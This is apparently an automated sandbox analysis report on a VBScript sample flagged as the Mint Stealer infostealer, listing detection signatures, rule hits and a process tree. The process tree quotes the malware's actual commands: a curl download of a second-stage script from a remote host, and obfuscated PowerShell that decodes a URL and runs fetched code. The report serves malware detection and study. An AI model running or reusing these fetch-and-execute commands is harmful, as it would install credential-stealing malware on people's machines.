Windows Analysis Report
67618a47ee8c5.vbs
Overview
General Information
Detection
Mint Stealer
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 6540, cmdline: `C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 1804, cmdline: `"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2268, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 2852, cmdline: `curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs`, MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 6456, cmdline: `"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2988, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5708, cmdline: `"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 2988, cmdline: `"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- conhost.exe (PID: 4852, cmdline: `conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7016, cmdline: `powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6536, cmdline: `conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2144, cmdline: `powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 368, cmdline: `"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7100, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7088, cmdline: `"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 5916, cmdline: `"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
(not present in the extracted page) | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | 
(not present in the extracted page) | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | 
(not present in the extracted page) | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | 
(not present in the extracted page) | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | 
(not present in the extracted page) | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | 
System Summary (Sigma rule authors; the rule source column is not present in the extracted page)
- Perez Diego (@darkquassar), oscd.community
- frack113, Florian Roth
- Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
- Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
- Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
- Tim Shelton
- frack113
- James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
- Michael Haag
- Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)